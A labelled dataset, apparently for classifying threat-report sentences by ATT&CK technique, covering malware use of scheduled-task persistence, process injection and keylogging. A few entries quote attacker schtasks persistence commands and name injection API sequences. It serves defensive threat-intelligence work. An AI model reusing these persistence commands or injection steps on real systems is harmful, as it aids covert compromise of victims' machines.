{"text1":"Attor's installer plugin can schedule a new task that loads the dispatcher on boot\/logon.","labels":"['T1053.005']"}
|
|
{"text1":"BADNEWS creates a scheduled task to establish persistence by executing a malicious payload every subsequent minute.","labels":"['T1053.005']"}
|
|
{"text1":"BITTER has used scheduled tasks for persistence and execution.","labels":"['T1053.005']"}
|
|
{"text1":"BONDUPDATER persists using a scheduled task that executes every minute.","labels":"['T1053.005']"}
|
|
{"text1":"BRONZE BUTLER has used schtasks to register a scheduled task to execute malware during lateral movement.","labels":"['T1053.005']"}
|
|
{"text1":"BabyShark has used scheduled tasks to maintain persistence.","labels":"['T1053.005']"}
|
|
{"text1":"BackConfig has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host.","labels":"['T1053.005']"}
|
|
{"text1":"Blue Mockingbird has used Windows Scheduled Tasks to establish persistence on local and remote hosts.","labels":"['T1053.005']"}
|
|
{"text1":"Carbon creates several tasks for later execution to continue persistence on the victim\u2019s machine.","labels":"['T1053.005']"}
|
|
{"text1":"Cobalt Group has created Windows tasks to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"ComRAT has used a scheduled task to launch its PowerShell loader.","labels":"['T1053.005']"}
|
|
{"text1":"Confucius has created scheduled tasks to maintain persistence on a compromised host.","labels":"['T1053.005']"}
|
|
{"text1":"CostaRicto has used scheduled tasks to download backdoor tools.","labels":"['T1053.005']"}
|
|
{"text1":"Crutch has the ability to persist using scheduled tasks.","labels":"['T1053.005']"}
|
|
{"text1":"Dragonfly 2.0 used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files.","labels":"['T1053.005']"}
|
|
{"text1":"Dragonfly has used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files.","labels":"['T1053.005']"}
|
|
{"text1":"During Frankenstein, the threat actors established persistence through a scheduled task using the command: `\/Create \/F \/SC DAILY \/ST 09:00 \/TN WinUpdate \/TR`, named \"WinUpdate\"","labels":"['T1053.005']"}
|
|
{"text1":"During Operation Wocao, threat actors used scheduled tasks to execute malicious PowerShell code on remote systems.","labels":"['T1053.005']"}
|
|
{"text1":"Empire has modules to interact with the Windows task scheduler.","labels":"['T1053.005']"}
|
|
{"text1":"EvilBunny has executed commands via scheduled tasks.","labels":"['T1053.005']"}
|
|
{"text1":"FIN10 has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.","labels":"['T1053.005']"}
|
|
{"text1":"FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.","labels":"['T1053.005']"}
|
|
{"text1":"FIN7 malware has created scheduled tasks to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"FIN8 has used scheduled tasks to maintain RDP backdoors.","labels":"['T1053.005']"}
|
|
{"text1":"Fox Kitten has used Scheduled Tasks for persistence and to load and execute a reverse proxy binary.","labels":"['T1053.005']"}
|
|
{"text1":"Frankenstein has established persistence through a scheduled task using the command: \" \/Create \/F \/SC DAILY \/ST 09:00 \/TN WinUpdate \/TR \", named \"WinUpdate\".","labels":"['T1053.005']"}
|
|
{"text1":"GALLIUM established persistence for PoisonIvy by creating a scheduled task.","labels":"['T1053.005']"}
|
|
{"text1":"GRIFFON has used \"sctasks\" for persistence.","labels":"['T1053.005']"}
|
|
{"text1":"Gamaredon Group has created scheduled tasks to launch executables after a designated number of minutes have passed.","labels":"['T1053.005']"}
|
|
{"text1":"Gazer can establish persistence by creating a scheduled task.","labels":"['T1053.005']"}
|
|
{"text1":"GoldMax has used scheduled tasks to maintain persistence.","labels":"['T1053.005']"}
|
|
{"text1":"Goopy has the ability to maintain persistence by creating scheduled tasks set to run every hour.","labels":"['T1053.005']"}
|
|
{"text1":"GravityRAT creates a scheduled task to ensure it is re-executed every day.","labels":"['T1053.005']"}
|
|
{"text1":"GrimAgent has the ability to set persistence using the Task Scheduler.","labels":"['T1053.005']"}
|
|
{"text1":"HEXANE has used a scheduled task to establish persistence for a keylogger.","labels":"['T1053.005']"}
|
|
{"text1":"Helminth has used a scheduled task for persistence.","labels":"['T1053.005']"}
|
|
{"text1":"HotCroissant has attempted to install a scheduled task named \u201cJava Maintenance64\u201d on startup to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"ISMInjector creates scheduled tasks to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"IronNetInjector has used a task XML file named \"mssch.xml\" to run an IronPython script when a user logs in or when specific system events are created.","labels":"['T1053.005']"}
|
|
{"text1":"JHUHUGIT has registered itself as a scheduled task to run each time the current user logs in.","labels":"['T1053.005']"}
|
|
{"text1":"JSS Loader has the ability to launch scheduled tasks to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"Koadic has used scheduled tasks to add persistence.","labels":"['T1053.005']"}
|
|
{"text1":"LitePower can create a scheduled task to enable persistence mechanisms.","labels":"['T1053.005']"}
|
|
{"text1":"Lokibot embedded the commands \"schtasks \/Run \/TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup \/I\" inside a batch script.","labels":"['T1053.005']"}
|
|
{"text1":"Lucifer has established persistence by creating the following scheduled task \"schtasks \/create \/sc minute \/mo 1 \/tn QQMusic ^ \/tr C:Users\\%USERPROFILE%\\Downloads\\spread.exe \/F\".","labels":"['T1053.005']"}
|
|
{"text1":"MCMD can use scheduled tasks for persistence.","labels":"['T1053.005']"}
|
|
{"text1":"Machete has created scheduled tasks to maintain Machete's persistence.","labels":"['T1053.005']"}
|
|
{"text1":"Machete used scheduled tasks for persistence.","labels":"['T1053.005']"}
|
|
{"text1":"Maze has created scheduled tasks using name variants such as \"Windows Update Security\", \"Windows Update Security Patches\", and \"Google Chrome Security Update\", to launch Maze at a specific time.","labels":"['T1053.005']"}
|
|
{"text1":"Meteor execution begins from a scheduled task named `Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeAll` and it creates a separate scheduled task called `mstask` to run the wiper only once at 23:55:00.","labels":"['T1053.005']"}
|
|
{"text1":"Milan can establish persistence on a targeted host with scheduled tasks.","labels":"['T1053.005']"}
|
|
{"text1":"MuddyWater has used scheduled tasks to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"Mustang Panda has created a scheduled task to execute additional malicious software, as well as maintain persistence.","labels":"['T1053.005']"}
|
|
{"text1":"NETWIRE can create a scheduled task to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"Okrum's installer can attempt to achieve persistence by creating a scheduled task.","labels":"['T1053.005']"}
|
|
{"text1":"One persistence mechanism used by CozyCar is to register itself as a scheduled task.","labels":"['T1053.005']"}
|
|
{"text1":"OopsIE creates a scheduled task to run itself every three minutes.","labels":"['T1053.005']"}
|
|
{"text1":"Operation Wocao has used scheduled tasks to execute malicious PowerShell code on remote systems.","labels":"['T1053.005']"}
|
|
{"text1":"PowerSploit's \"New-UserPersistenceOption\" Persistence argument can be used to establish persistence via a Scheduled Task\/Job.","labels":"['T1053.005']"}
|
|
{"text1":"Pteranodon schedules tasks to invoke its components in order to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"QUADAGENT creates a scheduled task to maintain persistence on the victim\u2019s machine.","labels":"['T1053.005']"}
|
|
{"text1":"RTM tries to add a scheduled task to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"RainyDay can use scheduled tasks to achieve persistence.","labels":"['T1053.005']"}
|
|
{"text1":"Ramsay can schedule tasks via the Windows COM API to maintain persistence.","labels":"['T1053.005']"}
|
|
{"text1":"Rancor launched a scheduled task to gain persistence using the \"schtasks \/create \/sc\" command.","labels":"['T1053.005']"}
|
|
{"text1":"Remexi utilizes scheduled tasks as a persistence mechanism.","labels":"['T1053.005']"}
|
|
{"text1":"RemoteCMD can execute commands remotely by creating a new scheduled task on the remote system.","labels":"['T1053.005']"}
|
|
{"text1":"Ryuk can remotely create a scheduled task to execute itself on a system.","labels":"['T1053.005']"}
|
|
{"text1":"SQLRat has created scheduled tasks in \"%appdata%\\Roaming\\Microsoft\\Templates\\\".","labels":"['T1053.005']"}
|
|
{"text1":"Saint Bot has created a scheduled task named \"Maintenance\" to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"ServHelper contains modules that will use schtasks to carry out malicious operations.","labels":"['T1053.005']"}
|
|
{"text1":"SharpStage has a persistence component to write a scheduled task for the payload.","labels":"['T1053.005']"}
|
|
{"text1":"Stealth Falcon malware creates a scheduled task entitled \u201cIE Web Cache\u201d to execute a malicious file hourly.","labels":"['T1053.005']"}
|
|
{"text1":"Stuxnet schedules a network job to execute two minutes after host infection.","labels":"['T1053.005']"}
|
|
{"text1":"TEMP.Veles has used scheduled task XML triggers.","labels":"['T1053.005']"}
|
|
{"text1":"Tarrask is able to create \u201chidden\u201d scheduled tasks for persistence.","labels":"['T1053.005']"}
|
|
{"text1":"Tomiris has used `SCHTASKS \/CREATE \/SC DAILY \/TN StartDVL \/TR \"[path to self]\" \/ST 10:00` to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"TrickBot creates a scheduled task on the system that provides persistence.","labels":"['T1053.005']"}
|
|
{"text1":"Zebrocy has a command to create a scheduled task for persistence.","labels":"['T1053.005']"}
|
|
{"text1":"ccf32 can run on a daily basis using a scheduled task.","labels":"['T1053.005']"}
|
|
{"text1":"menuPass has used a script (atexec.py) to execute a command on a target machine via Task Scheduler.","labels":"['T1053.005']"}
|
|
{"text1":"schtasks is used to schedule tasks on a Windows system to run at a specific date and time.","labels":"['T1053.005']"}
|
|
{"text1":"yty establishes persistence by creating a scheduled task with the command \"SchTasks \/Create \/SC DAILY \/TN BigData \/TR \u201c + path_file + \u201c\/ST 09:30\u201c\".","labels":"['T1053.005']"}
|
|
{"text1":"zwShell has used SchTasks for execution.","labels":"['T1053.005']"}
|
|
{"text1":"ABK has the ability to inject shellcode into svchost.exe.","labels":"['T1055']"}
|
|
{"text1":"APT32 malware has injected a Cobalt Strike beacon into Rundll32.exe.","labels":"['T1055']"}
|
|
{"text1":"APT37 injects its malware variant, ROKRAT, into the cmd.exe process.","labels":"['T1055']"}
|
|
{"text1":"APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.","labels":"['T1055']"}
|
|
{"text1":"Agent Tesla can inject into known, vulnerable binaries on targeted hosts.","labels":"['T1055']"}
|
|
{"text1":"Attor's dispatcher can inject itself into running processes to gain higher privileges and to evade detection.","labels":"['T1055']"}
|
|
{"text1":"AuditCred can inject code from files to other running processes.","labels":"['T1055']"}
|
|
{"text1":"Avenger has the ability to inject shellcode into svchost.exe.","labels":"['T1055']"}
|
|
{"text1":"BBK has the ability to inject shellcode into svchost.exe.","labels":"['T1055']"}
|
|
{"text1":"Bumblebee can inject code into multiple processes on infected endpoints.","labels":"['T1055']"}
|
|
{"text1":"Cardinal RAT injects into a newly spawned process created from a native Windows executable.","labels":"['T1055']"}
|
|
{"text1":"Clambling can inject into the `svchost.exe` process for execution.","labels":"['T1055']"}
|
|
{"text1":"Cobalt Group has injected code into trusted processes.","labels":"['T1055']"}
|
|
{"text1":"Donut includes a subproject \"DonutTest\" to inject shellcode into a target process.","labels":"['T1055']"}
|
|
{"text1":"During Operation Sharpshooter, threat actors leveraged embedded shellcode to inject a downloader into the memory of Word.","labels":"['T1055']"}
|
|
{"text1":"During Operation Wocao, threat actors injected code into a selected process, which in turn launches a command as a child process of the original.","labels":"['T1055']"}
|
|
{"text1":"Gazer injects its communication module into an Internet accessible process through which it performs C2.","labels":"['T1055']"}
|
|
{"text1":"GuLoader has the ability to inject shellcode into a donor process that is started in a suspended state. GuLoader has previously used RegAsm as a donor process.","labels":"['T1055']"}
|
|
{"text1":"HOPLIGHT has injected into running processes.","labels":"['T1055']"}
|
|
{"text1":"HiddenWasp adds itself to the LD_PRELOAD path and sets a series of environment variables.","labels":"['T1055']"}
|
|
{"text1":"Honeybee uses a batch file to load a DLL into the svchost.exe process.","labels":"['T1055']"}
|
|
{"text1":"InvisiMole can inject itself into another process to avoid detection, including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure.","labels":"['T1055']"}
|
|
{"text1":"IronNetInjector can use an IronPython script to load a .NET injector to inject a payload into its own or a remote process.","labels":"['T1055']"}
|
|
{"text1":"JHUHUGIT performs code injection, injecting its own functions into browser processes.","labels":"['T1055']"}
|
|
{"text1":"JPIN can inject content into lsass.exe to load a module.","labels":"['T1055']"}
|
|
{"text1":"Kimsuky has used Win7Elevate to inject malicious code into explorer.exe.","labels":"['T1055']"}
|
|
{"text1":"Lizar can migrate the loader into another process.","labels":"['T1055']"}
|
|
{"text1":"Mis-Type has been injected directly into a running process, including `explorer.exe`.","labels":"['T1055']"}
|
|
{"text1":"NETWIRE can inject code into system processes including notepad.exe, svchost.exe, and vbc.exe.","labels":"['T1055']"}
|
|
{"text1":"NavRAT copies itself into a running Internet Explorer process to evade detection.","labels":"['T1055']"}
|
|
{"text1":"PLATINUM has used various methods of process injection including hot patching.","labels":"['T1055']"}
|
|
{"text1":"Pandora can start and inject code into a new `svchost` process.","labels":"['T1055']"}
|
|
{"text1":"PoshC2 contains multiple modules for injecting into processes, such as \"Invoke-PSInject\".","labels":"['T1055']"}
|
|
{"text1":"QakBot can inject itself into processes including explore.exe, Iexplore.exe, and Mobsync.exe.","labels":"['T1055']"}
|
|
{"text1":"REvil can inject itself into running processes on a compromised host.","labels":"['T1055']"}
|
|
{"text1":"ROKRAT can use `VirtualAlloc`, `WriteProcessMemory`, and then `CreateRemoteThread` to execute shellcode within the address space of `Notepad.exe`.","labels":"['T1055']"}
|
|
{"text1":"SILENTTRINITY can inject shellcode directly into Excel.exe or a specific process.","labels":"['T1055']"}
|
|
{"text1":"SLOTHFULMEDIA can inject into running processes on a compromised host.","labels":"['T1055']"}
|
|
{"text1":"ShadowPad has injected an install module into a newly created process.","labels":"['T1055']"}
|
|
{"text1":"Silence has injected a DLL library containing a Trojan into the fwmain32.exe process.","labels":"['T1055']"}
|
|
{"text1":"Smoke Loader injects into the Internet Explorer process.","labels":"['T1055']"}
|
|
{"text1":"StoneDrill has relied on injecting its payload directly into the process memory of the victim's preferred browser.","labels":"['T1055']"}
|
|
{"text1":"The PcShare payload has been injected into the `logagent.exe` and `rdpclip.exe` processes.","labels":"['T1055']"}
|
|
{"text1":"TrickBot has used \"Nt*\" Native API functions to inject code into legitimate processes such as \"wermgr.exe\".","labels":"['T1055']"}
|
|
{"text1":"Turla has also used PowerSploit's \"Invoke-ReflectivePEInjection.ps1\" to reflectively load a PowerShell payload into a random process on the victim system.","labels":"['T1055']"}
|
|
{"text1":"WarzoneRAT has the ability to inject malicious DLLs into a specific process for privilege escalation.","labels":"['T1055']"}
|
|
{"text1":"Waterbear can inject decrypted shellcode into the LanmanServer service.","labels":"['T1055']"}
|
|
{"text1":"Wiarp creates a backdoor through which remote attackers can inject files into running processes.","labels":"['T1055']"}
|
|
{"text1":"Wingbird performs multiple process injections to hijack system processes and execute malicious code.","labels":"['T1055']"}
|
|
{"text1":"gh0st RAT can inject malicious code into process created by the \u201cCommand_Create&Inject\u201d function.","labels":"['T1055']"}
|
|
{"text1":"injects a malicious DLL into the IExplorer.exe process.","labels":"['T1055']"}
|
|
{"text1":"A Lazarus Group malware sample performs reflective DLL injection.","labels":"['T1055.001']"}
|
|
{"text1":"After decrypting itself in memory, RARSTONE downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This \u201cdownloaded\u201d file is actually not dropped onto the system.","labels":"['T1055.001']"}
|
|
{"text1":"Aria-body has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.","labels":"['T1055.001']"}
|
|
{"text1":"Carberp's bootkit can inject a malicious DLL into the address space of running processes.","labels":"['T1055.001']"}
|
|
{"text1":"Carbon has a command to inject code into a process.","labels":"['T1055.001']"}
|
|
{"text1":"Duqu will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host).","labels":"['T1055.001']"}
|
|
{"text1":"During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.","labels":"['T1055.001']"}
|
|
{"text1":"Dyre injects into other processes to load modules.","labels":"['T1055.001']"}
|
|
{"text1":"Elise injects DLL files into iexplore.exe.","labels":"['T1055.001']"}
|
|
{"text1":"Emissary injects its DLL file into a newly spawned Internet Explorer process.","labels":"['T1055.001']"}
|
|
{"text1":"Emotet has been observed injecting into Explorer.exe and other processes.","labels":"['T1055.001']"}
|
|
{"text1":"Gelsemium has the ability to inject DLLs into specific processes.","labels":"['T1055.001']"}
|
|
{"text1":"Get2 has the ability to inject DLLs into processes.","labels":"['T1055.001']"}
|
|
{"text1":"HIDEDRV injects a DLL for Downdelph into the explorer.exe process.","labels":"['T1055.001']"}
|
|
{"text1":"If running in a Windows environment, Kazuar saves a DLL to disk that is injected into the explorer.exe process to execute the payload. Kazuar can also be configured to inject and execute within specific processes.","labels":"['T1055.001']"}
|
|
{"text1":"Koadic can perform process injection by using a reflective DLL.","labels":"['T1055.001']"}
|
|
{"text1":"Leviathan has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.","labels":"['T1055.001']"}
|
|
{"text1":"Matryoshka uses reflective DLL injection to inject the malicious library and execute the RAT.","labels":"['T1055.001']"}
|
|
{"text1":"Maze has injected the malware DLL into a target process.","labels":"['T1055.001']"}
|
|
{"text1":"MegaCortex loads \"injecthelper.dll\" into a newly created \"rundll32.exe\" process.","labels":"['T1055.001']"}
|
|
{"text1":"Metamorfo has injected a malicious DLL into the Windows Media Player process (wmplayer.exe).","labels":"['T1055.001']"}
|
|
{"text1":"Mongall can inject a DLL into `rundll32.exe` for execution.","labels":"['T1055.001']"}
|
|
{"text1":"PS1 can inject its payload DLL into memory.","labels":"['T1055.001']"}
|
|
{"text1":"PipeMon can inject its modules into various processes using reflective DLL loading.","labels":"['T1055.001']"}
|
|
{"text1":"PoisonIvy can inject a malicious DLL into a process.","labels":"['T1055.001']"}
|
|
{"text1":"Pupy can migrate into another process using reflective DLL injection.","labels":"['T1055.001']"}
|
|
{"text1":"RATANKBA performs a reflective DLL injection using a given pid.","labels":"['T1055.001']"}
|
|
{"text1":"Remsec can perform DLL injection.","labels":"['T1055.001']"}
|
|
{"text1":"SDBbot has the ability to inject a downloaded DLL into a newly created rundll32.exe process.","labels":"['T1055.001']"}
|
|
{"text1":"Saint Bot has injected its DLL component into `EhStorAurhn.exe`.","labels":"['T1055.001']"}
|
|
{"text1":"Socksbot creates a suspended svchost process and injects its DLL into it.","labels":"['T1055.001']"}
|
|
{"text1":"SombRAT can execute \"loadfromfile\", \"loadfromstorage\", and \"loadfrommem\" to inject a DLL from disk, storage, or memory respectively.","labels":"['T1055.001']"}
|
|
{"text1":"Stuxnet injects an entire DLL into an existing, newly created, or preselected trusted process.","labels":"['T1055.001']"}
|
|
{"text1":"Sykipot injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe.","labels":"['T1055.001']"}
|
|
{"text1":"Taidoor can perform DLL loading.","labels":"['T1055.001']"}
|
|
{"text1":"The Bumblebee loader can support the `Dij` command which gives it the ability to inject DLLs into the memory of other processes.","labels":"['T1055.001']"}
|
|
{"text1":"The FunnyDream FilepakMonitor component can inject into the Bka.exe process using the `VirtualAllocEx`, `WriteProcessMemory` and `CreateRemoteThread` APIs to load the DLL component.","labels":"['T1055.001']"}
|
|
{"text1":"The Netwalker DLL has been injected reflectively into the memory of a legitimate running process.","labels":"['T1055.001']"}
|
|
{"text1":"Tropic Trooper has injected a DLL backdoor into dllhost.exe and svchost.exe.","labels":"['T1055.001']"}
|
|
{"text1":"Turla has used Metasploit to perform reflective DLL injection in order to escalate privileges.","labels":"['T1055.001']"}
|
|
{"text1":"Wizard Spider has injected malicious DLLs into memory with read, write, and execute permissions.","labels":"['T1055.001']"}
|
|
{"text1":"ZxShell is injected into a shared SVCHOST process.","labels":"['T1055.001']"}
|
|
{"text1":"Carbanak downloads an executable and injects it directly into a new process.","labels":"['T1055.002']"}
|
|
{"text1":"GreyEnergy has a module to inject a PE binary into a remote process.","labels":"['T1055.002']"}
|
|
{"text1":"Lizar can execute PE files in the address space of the specified process.","labels":"['T1055.002']"}
|
|
{"text1":"Rocke's miner, \"TermsHost.exe\", evaded defenses by injecting itself into Windows processes, including Notepad.exe.","labels":"['T1055.002']"}
|
|
{"text1":"Zeus Panda checks processes on the system and if they meet the necessary requirements, it injects into that process.","labels":"['T1055.002']"}
|
|
{"text1":"Gazer performs thread execution hijacking to inject its orchestrator into a running thread from a remote process.","labels":"['T1055.003']"}
|
|
{"text1":"Trojan.Karagany can inject a suspended thread of its own process into a new process and initiate via the \"ResumeThread\" API.","labels":"['T1055.003']"}
|
|
{"text1":"Waterbear can use thread injection to inject shellcode into the process of security software.","labels":"['T1055.003']"}
|
|
{"text1":"Attor performs the injection by attaching its code into the APC queue using NtQueueApcThread API.","labels":"['T1055.004']"}
|
|
{"text1":"Bumblebee can use asynchronous procedure call (APC) injection to execute commands received from C2.","labels":"['T1055.004']"}
|
|
{"text1":"Carberp has queued an APC routine to explorer.exe by calling ZwQueueApcThread.","labels":"['T1055.004']"}
|
|
{"text1":"FIN8 has injected malicious code into a new svchost.exe process.","labels":"['T1055.004']"}
|
|
{"text1":"IcedID has used \"ZwQueueApcThread\" to inject itself into remote processes.","labels":"['T1055.004']"}
|
|
{"text1":"InvisiMole can inject its code into a trusted process via the APC queue.","labels":"['T1055.004']"}
|
|
{"text1":"Pillowmint has used the NtQueueApcThread syscall to inject code into svchost.exe.","labels":"['T1055.004']"}
|
|
{"text1":"Saint Bot has written its payload into a newly-created `EhStorAuthn.exe` process using `ZwWriteVirtualMemory` and executed it using `NtQueueApcThread` and `ZwAlertResumeThread`.","labels":"['T1055.004']"}
|
|
{"text1":"TURNEDUP is capable of injecting code into the APC queue of a created Rundll32 process as part of an \"Early Bird injection.\"","labels":"['T1055.004']"}
|
|
{"text1":"Epic has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process.","labels":"['T1055.011']"}
{"text1":"Power Loader overwrites Explorer\u2019s Shell_TrayWnd extra window memory to redirect execution to an NTDLL function that is abused to assemble and execute a return-oriented programming (ROP) chain and create a malicious thread within Explorer.exe.","labels":"['T1055.011']"}
{"text1":"A Threat Group-3390 tool can spawn svchost.exe and inject the payload into that process.","labels":"['T1055.012']"}
{"text1":"Astaroth can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code.","labels":"['T1055.012']"}
{"text1":"Azorult can decrypt the payload into memory, create a new suspended process of itself, then inject a decrypted payload to the new process and resume new process execution.","labels":"['T1055.012']"}
{"text1":"BBSRAT has been seen loaded into msiexec.exe through process hollowing to hide its execution.","labels":"['T1055.012']"}
{"text1":"Bandook has been launched by starting iexplore.exe and replacing it with Bandook's payload.","labels":"['T1055.012']"}
{"text1":"Bazar can inject into a target process including Svchost, Explorer, and cmd using process hollowing.","labels":"['T1055.012']"}
{"text1":"Clambling can execute binaries through process hollowing.","labels":"['T1055.012']"}
{"text1":"Cobalt Strike can use process hollowing for execution.","labels":"['T1055.012']"}
{"text1":"Denis performed process hollowing through the API calls CreateRemoteThread, ResumeThread, and Wow64SetThreadContext.","labels":"['T1055.012']"}
{"text1":"Duqu is capable of loading executable code via process hollowing.","labels":"['T1055.012']"}
{"text1":"Gorgon Group malware can use process hollowing to inject one of its trojans into another process.","labels":"['T1055.012']"}
{"text1":"ISMInjector hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.","labels":"['T1055.012']"}
{"text1":"Kimsuky has used a file injector DLL to spawn a benign process on the victim's system and inject the malicious payload into it via process hollowing.","labels":"['T1055.012']"}
{"text1":"Lokibot has used process hollowing to inject itself into a legitimate Windows process.","labels":"['T1055.012']"}
{"text1":"RCSession can launch itself from a hollowed svchost.exe process.","labels":"['T1055.012']"}
{"text1":"Smoke Loader spawns a new copy of c:\\windows\\syswow64\\explorer.exe and then replaces the executable code in memory with malware.","labels":"['T1055.012']"}
{"text1":"Some Orz versions have an embedded DLL known as MockDll that uses process hollowing and Regsvr32 to execute another payload.","labels":"['T1055.012']"}
{"text1":"The NETWIRE payload has been injected into benign Microsoft executables via process hollowing.","labels":"['T1055.012']"}
{"text1":"The Saint Bot loader has used API calls to spawn `MSBuild.exe` in a suspended state before injecting the decrypted Saint Bot binary into it.","labels":"['T1055.012']"}
{"text1":"TrickBot injects into the svchost.exe process.","labels":"['T1055.012']"}
{"text1":"Ursnif has used process hollowing to inject into child processes.","labels":"['T1055.012']"}
{"text1":"WhisperGate has the ability to inject its fourth stage into a suspended process created by the legitimate Windows utility `InstallUtil.exe`.","labels":"['T1055.012']"}
{"text1":"Bazar can inject into a target process using process doppelg\u00e4nging.","labels":"['T1055.013']"}
{"text1":"Leafminer has used Process Doppelg\u00e4nging to evade security software while deploying tools on compromised systems.","labels":"['T1055.013']"}
{"text1":"SynAck abuses NTFS transactions to launch and conceal malicious processes.","labels":"['T1055.013']"}
{"text1":"InvisiMole has used ListPlanting to inject code into a trusted process.","labels":"['T1055.015']"}
{"text1":"APT39 has utilized tools to capture mouse movements.","labels":"['T1056']"}
{"text1":"ADVSTORESHELL can perform keylogging.","labels":"['T1056.001']"}
{"text1":"APT28 has used tools to perform keylogging.","labels":"['T1056.001']"}
{"text1":"APT3 has used a keylogging tool that records keystrokes in encrypted files.","labels":"['T1056.001']"}
{"text1":"APT32 has abused the PasswordChangeNotify to monitor for and capture account password changes.","labels":"['T1056.001']"}
{"text1":"APT38 used a Trojan called KEYLIME to capture keystrokes from the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"APT39 has used tools for capturing keystrokes.","labels":"['T1056.001']"}
{"text1":"APT41 used a keylogger called GEARSHIFT on a target system.","labels":"['T1056.001']"}
{"text1":"Agent Tesla can log keystrokes on the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"Ajax Security Team has used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system.","labels":"['T1056.001']"}
{"text1":"AppleSeed can use \"GetKeyState\" and \"GetKeyboardState\" to capture keystrokes on the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"Astaroth logs keystrokes from the victim's machine.","labels":"['T1056.001']"}
{"text1":"BISCUIT can capture keystrokes.","labels":"['T1056.001']"}
{"text1":"BadPatch has a keylogging capability.","labels":"['T1056.001']"}
{"text1":"Bandook contains keylogging capabilities.","labels":"['T1056.001']"}
{"text1":"BlackEnergy has run a keylogger plug-in on a victim.","labels":"['T1056.001']"}
{"text1":"CHOPSTICK is capable of performing keylogging.","labels":"['T1056.001']"}
{"text1":"Carbanak logs keystrokes for configured processes and sends them back to the C2 server.","labels":"['T1056.001']"}
{"text1":"Cardinal RAT can log keystrokes.","labels":"['T1056.001']"}
{"text1":"Catchamas collects keystrokes from the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"Cobalt Strike can track key presses with a keylogger module.","labels":"['T1056.001']"}
{"text1":"Cobian RAT has a feature to perform keylogging on the victim\u2019s machine.","labels":"['T1056.001']"}
{"text1":"CosmicDuke uses a keylogger.","labels":"['T1056.001']"}
{"text1":"Crimson can use a module to perform keylogging on compromised hosts.","labels":"['T1056.001']"}
{"text1":"Cuba logs keystrokes via polling by using \"GetKeyState\" and \"VkKeyScan\" functions.","labels":"['T1056.001']"}
{"text1":"DarkComet has a keylogging capability.","labels":"['T1056.001']"}
{"text1":"DarkWatchman can track key presses with a keylogger module.","labels":"['T1056.001']"}
{"text1":"Darkhotel has used a keylogger.","labels":"['T1056.001']"}
{"text1":"Dtrack\u2019s dropper contains a keylogging executable.","labels":"['T1056.001']"}
{"text1":"Duqu can track key presses with a keylogger module.","labels":"['T1056.001']"}
{"text1":"DustySky contains a keylogger.","labels":"['T1056.001']"}
{"text1":"ECCENTRICBANDWAGON can capture and store keystrokes.","labels":"['T1056.001']"}
{"text1":"EvilGrab has the capability to capture keystrokes.","labels":"['T1056.001']"}
{"text1":"FIN4 has captured credentials via fake Outlook Web App (OWA) login pages and has also used a .NET based keylogger.","labels":"['T1056.001']"}
{"text1":"FakeM contains a keylogger module.","labels":"['T1056.001']"}
{"text1":"FlawedAmmyy can collect keyboard events.","labels":"['T1056.001']"}
{"text1":"Fysbis can perform keylogging.","labels":"['T1056.001']"}
{"text1":"Grandoreiro can log keystrokes on the victim's machine.","labels":"['T1056.001']"}
{"text1":"GreyEnergy has a module to harvest pressed keystrokes.","labels":"['T1056.001']"}
{"text1":"HEXANE has used a PowerShell-based keylogger named `kl.ps1`.","labels":"['T1056.001']"}
{"text1":"HTTPBrowser is capable of capturing keystrokes on victims.","labels":"['T1056.001']"}
{"text1":"Imminent Monitor has a keylogging module.","labels":"['T1056.001']"}
{"text1":"KGH_SPY can perform keylogging by polling the \"GetAsyncKeyState()\" function.","labels":"['T1056.001']"}
{"text1":"KONNI has the capability to perform keylogging.","labels":"['T1056.001']"}
{"text1":"Kasidet has the ability to initiate keylogging.","labels":"['T1056.001']"}
{"text1":"KeyBoy installs a keylogger for intercepting credentials and keystrokes.","labels":"['T1056.001']"}
{"text1":"Kimsuky has used a PowerShell-based keylogger as well as a tool called MECHANICAL to log keystrokes.","labels":"['T1056.001']"}
{"text1":"Kivars has the ability to initiate keylogging on the infected host.","labels":"['T1056.001']"}
{"text1":"Lazarus Group malware KiloAlfa contains keylogging functionality.","labels":"['T1056.001']"}
{"text1":"Lokibot has the ability to capture input on the compromised host via keylogging.","labels":"['T1056.001']"}
{"text1":"MacMa can use Core Graphics Event Taps to intercept user keystrokes from any text input field and save them to text files. Text input fields include Spotlight, Finder, Safari, Mail, Messages, and other apps that have text fields for passwords.","labels":"['T1056.001']"}
{"text1":"MacSpy captures keystrokes.","labels":"['T1056.001']"}
